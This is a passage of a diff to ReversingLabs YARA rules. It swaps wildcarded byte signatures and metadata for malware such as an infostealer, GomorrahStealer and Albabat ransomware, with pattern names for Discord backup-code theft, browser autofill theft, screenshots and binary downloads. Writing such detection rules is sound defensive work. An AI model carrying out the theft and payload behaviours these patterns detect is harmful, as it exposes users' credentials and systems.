-            8B 7C 24 ?? 31 C9 31 DB EB ?? 31 C0 31 C9 EB ?? 48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? ??
-            31 C9 31 FF 48 89 FE 0F 1F 44 00 ?? E8 ?? ?? ?? ?? 48 89 C1 48 89 DF 31 C0 31 DB 48
-            81 C4 ?? ?? ?? ?? 5D C3 48 89 C3 31 FF 48 89 C8 31 C9 48 81 C4 ?? ?? ?? ?? 5D C3 44
-            88 44 03 ?? 48 FF C1
-        }
-		$find_files_p1 = {
-            4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 55 48 89 E5 48 81 EC ?? ?? ??
-            ?? 48 89 B4 24 ?? ?? ?? ?? 48 89 BC 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 9C
-            24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84
-            24 ?? ?? ?? ?? 48 C7 40 ?? ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 89 5C 24 ?? 31 C9 EB ?? 48 8B 84 24 ?? ?? ?? ?? 48 83 C0 ?? 48
-            8B 4C 24 ?? 48 FF C1 48 8B 5C 24 ?? 0F 1F 84 00 ?? ?? ?? ?? 48 39 CB 0F 8E ?? ?? ??
-            ?? 48 89 4C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 53 ?? 48 89 94 24 ?? ?? ?? ?? 4C 8B
-            00 4C 89 44 24 ?? 4C 8B 48 ?? 4C 89 8C 24 ?? ?? ?? ?? 48 39 D1 75 ?? 31 C0 48 8B 9C
-            24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 66 90 EB ?? 31 C0 48 8B 9C 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8D 3D ??
-            ?? ?? ?? BE ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8B
-            4C 24 ?? 48 8B 51 ?? 48 8B 84 24 ?? ?? ?? ?? FF D2 48 8B 8C 24 ?? ?? ?? ?? 48 85 C9
-            48 8B 94 24 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 0F 45 D3 48 89 54 24 ?? 48 8B 9C 24 ?? ??
-            ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 0F 45 DF 48 89 9C 24 ?? ?? ?? ?? 84 C0 0F 84 ?? ??
-            ?? ?? 48 8B 4C 24 ?? 48 8B 51 ?? 48 8B 84 24 ?? ?? ?? ?? FF D2 48 89 84 24 ?? ?? ??
-            ?? 48 89 9C 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48
-            8B 84 24 ?? ?? ?? ?? 48 8B 5C 24 ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24
-            ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ??
-            48 8D 05 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? BF ?? ?? ?? ?? 48 8D B4 24
-        }
-		$find_files_p2 = {
-            41 B8 ?? ?? ?? ?? 4D 89 C1 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B
-            94 24 ?? ?? ?? ?? 48 39 D1 0F 85 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 49 ?? 48 8B 84 24
-            ?? ?? ?? ?? FF D1 44 0F 11 BC 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8B 8C 24
-            ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ??
-            48 89 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? BB ?? ?? ??
-            ?? 48 89 D9 E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 05 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ??
-            ?? ?? 48 8D 3D ?? ?? ?? ?? BE ?? ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 89 C1 48 89 DF 48
-            8B B4 24 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 4D 89 C1 48 8B 84 24 ?? ?? ?? ?? 48 8B 5C 24
-            ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B 11 90 66 90 48 85 D2 74 ?? 48 39 D1
-            74 ?? E9 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 74 ?? E8 ?? ?? ?? ?? 49 89 0B 48 8B 11 49
-            89 53 ?? 48 89 09 48 8B 51 ?? 4C 8B 41 ?? 4E 8D 0C 03 4C 8B 51 ?? 4C 39 CA 73 ?? 4C
-            89 84 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48 89 84 24 ?? ?? ?? ?? 4C 89 D0 48 89 D1 48 89
-            DF 48 8D 35 ?? ?? ?? ?? 4C 89 CB E8 ?? ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 49 89 C2 49
-            89 D9 48 89 CA 48 8B 84 24 ?? ?? ?? ?? 48 8B 5C 24 ?? 4C 89 94 24 ?? ?? ?? ?? 4C 89
-        }
-		$find_files_p3 = {
-            8C 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 4B 8D 34 02 48 89 D9 48 89 C3 48 89 F0 E8
-            ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ?? ?? 48 89 56 ?? 48 8B 94 24
-            ?? ?? ?? ?? 48 89 56 ?? 83 3D ?? ?? ?? ?? ?? 75 ?? 48 8B 94 24 ?? ?? ?? ?? EB ?? E8
-            ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 49 89 13 4C 8B 46 ?? 4D 89 43 ?? 48 89 56 ?? E9
-            ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 49 ?? 48 8B 84 24 ?? ?? ?? ?? FF D1 44 0F 11 BC 24
-            ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ??
-            ?? 48 8B 94 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 84
-            24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 89
-            84 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 84 24 ??
-            ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8D 3D ?? ?? ?? ?? BE ??
-            ?? ?? ?? 31 C0 E8 ?? ?? ?? ?? 48 89 C1 48 89 DF 48 8B B4 24 ?? ?? ?? ?? 41 B8 ?? ??
-            ?? ?? 4D 89 C1 48 8B 84 24 ?? ?? ?? ?? 48 8B 5C 24 ?? E8 ?? ?? ?? ?? 48 8B 8C 24 ??
-            ?? ?? ?? 48 8B 11 90 48 85 D2 74 ?? 48 39 D1 74 ?? E9 ?? ?? ?? ?? 83 3D ?? ?? ?? ??
-            ?? 74 ?? E8 ?? ?? ?? ?? 49 89 0B 48 8B 11 49 89 53 ?? 48 89 09 48 8B 51 ?? 4C 8B 41
-            ?? 4E 8D 0C 03 4C 8B 51 ?? 4C 39 CA 73 ?? 4C 89 84 24 ?? ?? ?? ?? 48 89 5C 24 ?? 48
-            89 84 24 ?? ?? ?? ?? 4C 89 D0 48 89 D1 48 89 DF 48 8D 35 ?? ?? ?? ?? 4C 89 CB E8 ??
-            ?? ?? ?? 4C 8B 84 24 ?? ?? ?? ?? 49 89 C2 49 89 D9 48 89 CA 48 8B 84 24 ?? ?? ?? ??
-            48 8B 5C 24 ?? 4C 89 94 24 ?? ?? ?? ?? 4C 89 8C 24 ?? ?? ?? ?? 48 89 94 24 ?? ?? ??
-            ?? 4B 8D 34 02 48 89 D9 48 89 C3 48 89 F0 E8 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 48
-        }
-		$find_files_p4 = {
-            8B B4 24 ?? ?? ?? ?? 48 89 56 ?? 48 8B 94 24 ?? ?? ?? ?? 48 89 56 ?? 83 3D ?? ?? ??
-            ?? ?? 75 ?? 48 8B 94 24 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 49
-            89 13 4C 8B 46 ?? 4D 89 43 ?? 48 89 56 ?? E9 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 51 ??
-            48 8B 84 24 ?? ?? ?? ?? FF D2 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8B
-            4C 24 ?? 48 8B 49 ?? 48 8B 84 24 ?? ?? ?? ?? FF D1 48 89 44 24 ?? 44 0F 11 BC 24 ??
-            ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 8B
-            84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89
-            84 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
-            8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 54 24 ?? 0F
-            57 C0 F2 48 0F 2A C2 F2 0F 10 0D ?? ?? ?? ?? F2 0F 59 C1 66 48 0F 7E C0 0F 1F 40 ??
-            E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ??
-            48 8D 05 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? BF ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ??
-            41 B8 ?? ?? ?? ?? 4D 89 C1 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ??
-            ?? E9 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B 41 ?? 48 89 C2 48 F7 DA 48 8B 59 ??
-            90 48 39 D3 77 ?? 48 81 FB ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 0F 4F D9 48 8D 0D ?? ?? ??
-            ?? 48 0F 4F C1 48 81 C4 ?? ?? ?? ?? 5D C3
-        }
-		$take_screenshot_p1 = {
-            4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 55 48 89 E5 48 81 EC ?? ?? ??
-            ?? 0F 1F 00 E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 5C 24 ?? B8 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8B 4C 24 ?? 48
-            89 8C 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 9C 24 ??
-            ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 E8
-            ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C 24 ?? B9 ?? ?? ?? ?? 90 E8 ?? ?? ?? ?? 48 8D BC
-            24 ?? ?? ?? ?? 48 8D 7F ?? 66 0F 1F 84 00 ?? ?? 00 00 66 0F 1F 44 00 ?? 48 89 6C 24
-            ?? 48 8D 6C 24 ?? E8 ?? ?? ?? ?? 48 8B 6D ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48
-            8D 05 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D
-            05 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 05
-            ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 05 ??
-            ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 05 ?? ??
-            ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 8C 24 ?? ??
-            ?? ?? BF ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 05 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C6 00 ?? 48 8B 8C 24 ?? ?? ?? ?? 84 01 83 3D ?? ?? ?? ?? ?? 75
-            ?? 48 8B 54 24 ?? EB ?? E8 ?? ?? ?? ?? 49 89 03 48 8B 91 ?? ?? ?? ?? 49 89 53 ?? 48
+		$ping_apnic = {
+            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 6A ?? 8D 85 ?? ?? ?? ?? C7
+            85 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 0F 57
+            C0 F3 0F 7F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 6A ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ??
+            8D 85 ?? ?? ?? ?? 50 6A ?? FF 15 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? FF
+            B5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3
         }
-		$take_screenshot_p2 = {
-            8B 54 24 ?? 49 89 53 ?? 48 8B 59 ?? 49 89 5B ?? 48 89 81 ?? ?? ?? ?? 48 8B 5C 24 ??
-            48 89 59 ?? 48 89 51 ?? 48 89 C8 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? E8 ??
-            ?? ?? ?? 0F 1F 44 00 ?? 48 85 FF 75 ?? 31 C9 31 D2 31 F6 EB ?? 31 C0 31 DB 48 89 D9
-            48 81 C4 ?? ?? ?? ?? 5D C3 48 89 04 3E 48 8B 84 24 ?? ?? ?? ?? 48 83 C0 ?? 48 8B 5C
-            24 ?? 48 FF CB 48 89 D7 48 89 F2 48 89 FE 66 90 48 85 DB 0F 8E ?? ?? ?? ?? 48 89 5C
-            24 ?? 48 89 94 24 ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 08 48 8B
-            50 ?? 48 8D 5E ?? 48 89 5C 24 ?? 48 8B 49 ?? 48 89 D0 FF D1 44 0F 11 BC 24 ?? ?? ??
-            ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 8C 24 ?? ?? ?? ?? 48 8B 54 24 ??
-            48 89 94 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 84 24
-            ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48
-            39 D1 72 ?? 48 8B B4 24 ?? ?? ?? ?? EB ?? 48 89 44 24 ?? 48 89 5C 24 ?? 48 8B 84 24
-            ?? ?? ?? ?? 48 89 D3 BF ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C6 48
-            89 DA 48 8B 44 24 ?? 48 8B 5C 24 ?? 48 8D 7A ?? 48 C1 E7 ?? 48 89 5C 3E ?? 83 3D ??
-            ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 49 89 03 4C 8B 04 3E 4D 89 43 ?? E9 ??
-            ?? ?? ?? 48 89 D0 48 89 F3 48 81 C4 ?? ?? ?? ?? 5D C3
+		$download_bin_1 = {
+            55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ??
+            33 C5 89 45 ?? 53 56 57 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 89 65 ?? 8B F2 8B C1 89 85 ??
+            ?? ?? ?? 8B 7D ?? 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? C7 85 ??
+            ?? ?? ?? ?? ?? ?? ?? 50 C7 45 ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 68 ?? ??
+            ?? ?? 83 EC ?? 8B CC 6A ?? 6A ?? C7 41 ?? ?? ?? ?? ?? C7 41 ?? ?? ?? ?? ?? 56 C6 01
+            ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8D 8D ?? ?? ?? ?? C6 45 ?? ??
+            E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? F6 84
+            05 ?? ?? ?? ?? ?? 74 ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? FF 50 ?? 8D 4D ?? 51 8B
+            C8 E8 ?? ?? ?? ?? 50 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 8B D7 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ??
+            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B D6 8B C8 E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8B C8 E8
+            ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 8D ??
+            ?? ?? ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 55
+            ?? C6 45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 8D ?? ?? ??
+            ?? E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8D 55 ?? C6
+            45 ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 8B 40 ?? F6 84 05 ?? ??
+            ?? ?? ?? 74 ?? 83 EC ?? 8D 45 ?? 8D 4D ?? 50 E8 ?? ?? ?? ?? C6 45 ?? ?? BA ?? ?? ??
+            ?? 8B C8 C7 85 ?? ?? ?? ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? B3 ?? EB ?? 32 DB
         }
-		$get_discord_backup_codes = {
-            48 89 44 24 ?? 48 8D 1D ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 8B B4
-            24 ?? ?? ?? ?? 49 89 D8 49 89 C9 31 C0 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ??
-            48 8B 5C 24 ?? 48 8D 0D ?? ?? ?? ?? BF ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 48 8D 0D ?? ?? ?? ?? 48 89 08 83 3D ?? ?? ?? ?? ?? 66 90 75 ?? 48 8B 54 24 ?? EB
-            ?? E8 ?? ?? ?? ?? 48 8B 54 24 ?? 49 89 13 48 8B 58 ?? 49 89 5B ?? 48 89 50 ?? E8 ??
-            ?? ?? ?? 48 89 44 24 ?? 48 89 C3 48 8D 0D ?? ?? ?? ?? BF ?? ?? ?? ?? 48 8D 05 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 08 83 3D ?? ?? ?? ?? ?? 74 ?? 48 8B
-            50 ?? 66 90 E8 ?? ?? ?? ?? 49 89 13 48 8D 15 ?? ?? ?? ?? 48 89 50 ?? 31 C0 48 8D 1D
-            ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 8B 74 24 ?? 49 89 D8 49 89 C9 E8 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 5C 24 ?? 48 8D 0D ?? ?? ?? ?? BF ?? ?? ??
-            ?? 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 10 83 3D ?? ?? ??
-            ?? ?? 75 ?? 48 8B 4C 24 ?? EB ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 49 89 0B 48 8B 50 ??
-            49 89 53 ?? 48 89 48 ?? 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75
-            ?? 48 8B 54 24 ?? EB ?? E8 ?? ?? ?? ?? 48 8B 54 24 ?? 49 89 13 48 89 10 BB ?? ?? ??
-            ?? 48 89 D9 E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 5C 24 ?? 48 8D 0D ?? ?? ?? ?? BF ??
-            ?? ?? ?? 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 10 83 3D ??
-            ?? ?? ?? ?? 75 ?? 48 8B 54 24 ?? EB ?? E8 ?? ?? ?? ?? 48 8B 54 24 ?? 49 89 13 4C 8B
-            48 ?? 4D 89 4B ?? 48 89 50 ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? 48 8B 4C 24 ?? 31 FF 31
-            F6 49 89 F0 E8 ?? ?? ?? ?? 31 C0 31 DB 48 83 C4 ?? 5D C3
+		$download_bin_2 = {
+            C7 45 ?? ?? ?? ?? ?? F6 85 ?? ?? ?? ?? ?? 74 ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ??
+            ?? ?? 83 C4 ?? 84 DB 74 ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 3D ?? ?? ?? ?? 74 ?? 8D 80 ?? ?? ?? ?? 89
+            85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? C7 45 ?? ?? ?? ??
+            ?? C7 45 ?? ?? ?? ?? ?? C6 45 ?? ?? 8B 85 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8B 40 ?? 03
+            C8 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 50 C6 45 ?? ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 83
+            C4 ?? 8B 8D ?? ?? ?? ?? 8B F0 85 C9 74 ?? 8B 01 FF 50 ?? 85 C0 74 ?? 8B 10 8B C8 6A
+            ?? FF 12 8B 06 8B CE 6A ?? 8B 40 ?? FF D0 50 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 8B 5D ?? 83 C4 ?? 8B 7D ?? 8B 08 8B 49 ?? F6 44 01 ?? ?? 75 ?? 8B 75 ?? 8D 4D ??
+            83 FB ?? B8 ?? ?? ?? ?? BA ?? ?? ?? ?? 0F 43 CF 3B F0 0F 42 C6 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 85 C0 75 ?? 83 FE ?? 73 ?? 83 C8 ?? EB ?? 33 C0 83 FE ?? 0F 95 C0 85 C0 0F 94
+            C0 84 C0 0F 94 C0 84 C0 0F 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C6 45 ??
+            ?? 50 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 E8 ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ??
+            ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 FB ?? 72 ?? 57 E8 ?? ?? ?? ?? 83 C4
+            ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 72 ?? FF 75 ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            C7 85 ?? ?? ?? ?? ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B C6 EB ?? 8B 8D ?? ?? ??
+            ?? 8B 01 FF 50 ?? 8B 8D ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? B8 ?? ?? ?? ?? C3 8B 85 ?? ??
+            ?? ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5F 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5
+            5D C3
         }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $get_mac_address ) and ( all of ( $find_files_p* ) ) and ( all of ( $take_screenshot_p* ) ) and ( $get_discord_backup_codes )
+		uint16( 0 ) == 0x5A4D and $ping_apnic and $download_bin_1 and $download_bin_2
 }
-rule REVERSINGLABS_Bytecode_MSIL_Infostealer_Gomorrahstealer : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win64_Ransomware_Albabat : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects GomorrahStealer infostealer."
+		description = "Yara rule that detects Albabat ransomware."
 		author = "ReversingLabs"
-		id = "f3c14d23-47a2-5b09-8f48-0c2f9350516a"
-		date = "2024-11-27"
-		modified = "2024-11-27"
+		id = "11941c0d-45fb-5746-bbad-f43f336d4b1d"
+		date = "2024-03-18"
+		modified = "2024-03-18"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/infostealer/ByteCode.MSIL.Infostealer.GomorrahStealer.yara#L1-L111"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/Win64.Ransomware.Albabat.yara#L1-L139"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "75d86ea2ef9f24487ef54979508170651cd60abba6daa4c3117e20a77bb3b086"
+		logic_hash = "38ec8388b9006f6ab9a397858b89f4bfd7def2ffcf525cfc736abae49bc6034a"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Infostealer"
-		tc_detection_name = "GomorrahStealer"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "Albabat"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$get_browser_autofill_data = {
-            1F ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0B 73 ?? ?? ?? ?? 0C 07 73 ?? ??
-            ?? ?? 0D 09 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 26 09 6F ?? ?? ?? ?? 0A 16 06 17 DA 13 ??
-            13 ?? 2B ?? 09 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 09 11 ?? 72 ?? ?? ?? ?? 6F
